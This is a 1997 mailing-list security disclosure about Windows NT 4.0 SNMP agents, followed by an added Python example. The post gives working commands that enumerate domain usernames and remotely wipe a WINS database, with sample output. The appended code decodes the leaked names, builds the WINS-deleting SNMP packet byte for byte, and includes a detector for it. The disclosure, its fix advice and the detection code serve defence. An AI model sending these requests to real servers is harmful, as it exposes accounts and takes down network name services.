Date: 10/13/97 6:12:52 PM
From: Aleph One
Subject: BoS: SNMP Insecurity
To: (""@LOCAL)

---------- Forwarded message ----------
Date: Tue, 7 Oct 1997 15:36:13 -0400
From: "Rouland, Christopher J"
To: "'ntsecurity@iss.net'"
Subject: [NTSEC] SNMP Insecurity

All:

I have found two significant "features" in the SNMP agent implementations under NT 4.0 Server, and I am sure there are more if I feel like really digging. The first issue I sent in earlier this year to Microsoft and received no response other than "expected behavior"; the second I just found, and it puts any large NT shop at a serious denial of service (DOS) risk.

1. This first exploit demonstrates the ability via SNMP to dump a list of all usernames in an NT domain (assuming the target box is a DC) or on an NT Server. Here is the simplest NT example I could find to use this:

    C:\NTRESKIT>snmputil walk <hostname> public .1.3.6.1.4.1.77.1.2.25

   (<hostname> should be a domain controller or server.) Sample output at end of message.

2. The second exploit demonstrates the ability via SNMP to delete all of the records in a WINS database remotely, bypassing all NT security. If you understand large scale WINS architecture, you can understand the implications of this. Knowledge of SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with "N" commands (N = number of WINS servers). This is permitted due to the extensive "cmd" set implemented in the WINS extension agent, specifically:

    cmdDeleteWins OBJECT-TYPE
        SYNTAX  IpAddress
        ACCESS  read-write
        STATUS  mandatory
        DESCRIPTION
            "This variable when set will cause all information pertaining
            to a WINS (data records, context information to be deleted
            from the local WINS. Use this only when owner-address mapping
            table is getting to near capacity.
            NOTE: deletion of all information pertaining to the managed
            WINS is not permitted"
        ::= { cmd 3 }

   Since the SNMP toolset implemented under NT will not do snmp-set-requests, my sample exploit was done using the CMU SNMP development kit under Unix. The command

    rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2

   successfully entirely deleted my WINS database.

3. It appears that there are several other pieces of the LMMIB2 definition that allow for things such as remote session deletion or disconnect, etc., but I have not yet looked into them.

4. The simplest fix is to disable SNMP, or to remove the extension agents through the SNMP configuration in the registry.

Regards,

Chris

--
Chris Rouland
Lehman Brothers, Inc.
crouland@lehman.com

-----

C:\NTRESKIT>snmputil walk 192.178.16.2 public .1.3.6.1.4.1.77.1.2.25

Output:

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116
Value = OCTET STRING - Guest

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.49
Value = OCTET STRING - test1

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.50
Value = OCTET STRING - test2

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.51
Value = OCTET STRING - test3

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.52
Value = OCTET STRING - test4

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.53
Value = OCTET STRING - test5

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.54
Value = OCTET STRING - test6

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.55
Value = OCTET STRING - test7

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.56
Value = OCTET STRING - test8

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.57
Value = OCTET STRING - test9

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.6.116.101.115.116.49.48
Value = OCTET STRING - test10

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114
Value = OCTET STRING - testuser

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97.116.111.114
Value = OCTET STRING - Administrator

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.49
Value = OCTET STRING - IUSR_NT4SRVDEV1

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.118.101.67.109.100.69.120.101.99
Value = OCTET STRING - SQLExecutiveCmdExec

End of MIB subtree.
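The following is an added example and is not part of Chris Rouland's post, the CMU toolkit, or Microsoft's agent code. It shows two things the post leaves implicit: first, that the instance index trailing svUserName in the walk output is itself the username (a length sub-identifier followed by one sub-identifier per byte), so the names leak even if the Value column is ignored; second, what the single snmpset command against cmdDeleteWins looks like on the wire as an SNMPv1 SetRequest, encoded here with a minimal BER encoder written for this example, together with a detection check that flags such a datagram by PDU type and OID rather than by community string. The walk excerpt is constructed from two rows of the output above; the OIDs and the address 192.178.16.2 are the ones the post uses.

```python
# Added example (not from the original post). Decode LanMan MIB svUserName
# instance indexes, build the SNMPv1 SetRequest that
# "snmpset -v 1 <host> public .1.3.6.1.4.1.311.1.2.5.3.0 a <ip>" sends,
# and detect that request on the wire. All sample data is constructed inline.
import re

CMD_DELETE_WINS = "1.3.6.1.4.1.311.1.2.5.3.0"   # OID from the post's snmpset command

# Constructed from two rows of the snmputil walk output in the post.
SAMPLE_WALK = """\
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116
Value = OCTET STRING - Guest
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97.116.111.114
Value = OCTET STRING - Administrator
"""


def decode_string_index(subids):
    """A string-keyed row index is: length sub-id, then one sub-id per character byte."""
    length, chars = subids[0], subids[1:]
    if len(chars) != length:
        raise ValueError("index says %d chars but %d sub-ids follow" % (length, len(chars)))
    return bytes(chars).decode("latin-1")


def parse_walk(text):
    """Return [(name decoded from the index, name reported in Value)] for each svUserName row."""
    pairs = re.findall(r"svUserName\.([\d.]+)\s*\nValue = OCTET STRING - (.*)", text)
    return [(decode_string_index([int(s) for s in idx.split(".")]), val.strip())
            for idx, val in pairs]


# --- minimal BER/SNMPv1 encoding, enough for one SetRequest ---
def ber_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(v):
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))


def ber_oid(dotted):
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:                      # base-128, high bit set on all but last byte
        enc = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            enc.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += enc
    return tlv(0x06, bytes(out))


def snmpv1_set_ipaddress(community, oid, ip, request_id=1):
    """SNMPv1 message carrying a SetRequest (tag 0xA3) with one IpAddress (tag 0x40) varbind."""
    value = tlv(0x40, bytes(int(o) for o in ip.split(".")))
    varbinds = tlv(0x30, tlv(0x30, ber_oid(oid) + value))
    pdu = tlv(0xA3, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)


def read_tlv(buf, pos):
    """Return (tag, body, position after the element); raises IndexError on truncation."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def is_wins_delete_set(datagram):
    """Detection check: SetRequest naming cmdDeleteWins, whatever the community string."""
    try:
        tag, msg, _ = read_tlv(datagram, 0)
        if tag != 0x30:
            return False
        _, _version, p = read_tlv(msg, 0)
        _, _community, p = read_tlv(msg, p)
        pdu_tag, pdu, _ = read_tlv(msg, p)
        if pdu_tag != 0xA3:
            return False
        p = 0
        for _ in range(3):                    # request-id, error-status, error-index
            _, _, p = read_tlv(pdu, p)
        _, varbinds, _ = read_tlv(pdu, p)
        target, p = ber_oid(CMD_DELETE_WINS), 0
        while p < len(varbinds):
            _, vb, p = read_tlv(varbinds, p)
            oid_tag, oid_body, _ = read_tlv(vb, 0)
            if tlv(oid_tag, oid_body) == target:
                return True
    except IndexError:
        return False
    return False


if __name__ == "__main__":
    for decoded, reported in parse_walk(SAMPLE_WALK):
        print("index decodes to %-15r  Value column says %r" % (decoded, reported))
    pkt = snmpv1_set_ipaddress("public", CMD_DELETE_WINS, "192.178.16.2")
    print("SetRequest on the wire:", pkt.hex())
    print("flagged as cmdDeleteWins set:", is_wins_delete_set(pkt))
```

The detector keys on the PDU tag and the varbind OID rather than on the community string, because the post's point is that the only thing protecting the WINS database is that string; a sensor that watches for SetRequests to the WINS agent's cmd subtree catches the attempt whether or not the string was guessed correctly.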